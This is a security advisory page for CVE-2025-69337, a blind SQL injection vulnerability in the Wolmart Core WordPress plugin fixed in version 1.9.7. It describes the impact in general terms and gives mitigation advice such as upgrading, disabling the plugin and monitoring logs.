Platform
wordpress
Component
wolmart-core
Fixed in
1.9.7
CVE-2025-69337 describes a critical SQL Injection vulnerability discovered in the Wolmart Core WordPress plugin. This flaw allows attackers to perform blind SQL injection, potentially leading to unauthorized data access and manipulation. The vulnerability impacts versions from 0.0.0 through 1.9.6, and a patch is available in version 1.9.7.
The SQL Injection vulnerability in Wolmart Core allows an attacker to bypass security measures and directly interact with the underlying database. Because it's a blind SQL injection, the attacker doesn't receive immediate feedback from the database server, requiring them to infer data through techniques like timing attacks or boolean-based queries. Successful exploitation could lead to the extraction of sensitive user data, including usernames, passwords, email addresses, and order details. Furthermore, an attacker could potentially modify database records, leading to data corruption or unauthorized changes to the website's functionality. The impact is particularly severe given the plugin's likely use in e-commerce sites, where sensitive financial information is often stored.
CVE-2025-69337 was published on 2026-02-20. The vulnerability is considered critical due to the potential for data exfiltration and modification. No public proof-of-concept (PoC) code has been released at the time of writing, but the nature of blind SQL injection makes it likely that such a PoC will emerge. It is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.04% (12% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-69337 is to immediately upgrade the Wolmart Core plugin to version 1.9.7 or later. If upgrading is not immediately feasible due to compatibility issues or breaking changes, consider temporarily disabling the plugin to prevent exploitation. While a direct WAF rule is difficult to implement for blind SQL injection, implementing a WAF with generic SQL injection detection rules can provide a layer of defense. Regularly review database access logs for suspicious activity, specifically looking for unusual query patterns or attempts to access sensitive tables. Implement strong database user permissions, limiting the plugin's access to only the necessary data.
Update to version 1.9.7, or a newer patched version
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-69337 is a critical SQL Injection vulnerability affecting Wolmart Core WordPress plugin versions 0.0.0–1.9.6, allowing attackers to potentially extract data from the database.
If you are using Wolmart Core WordPress plugin versions 0.0.0 through 1.9.6, you are vulnerable to this SQL Injection flaw.
Upgrade the Wolmart Core plugin to version 1.9.7 or later to resolve this vulnerability. If immediate upgrade is not possible, temporarily disable the plugin.
While no active exploitation has been confirmed, the nature of blind SQL injection suggests potential for exploitation, and monitoring is recommended.
Refer to the official Wolmart Core plugin website or the don-themes support channels for the latest advisory and updates regarding CVE-2025-69337.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.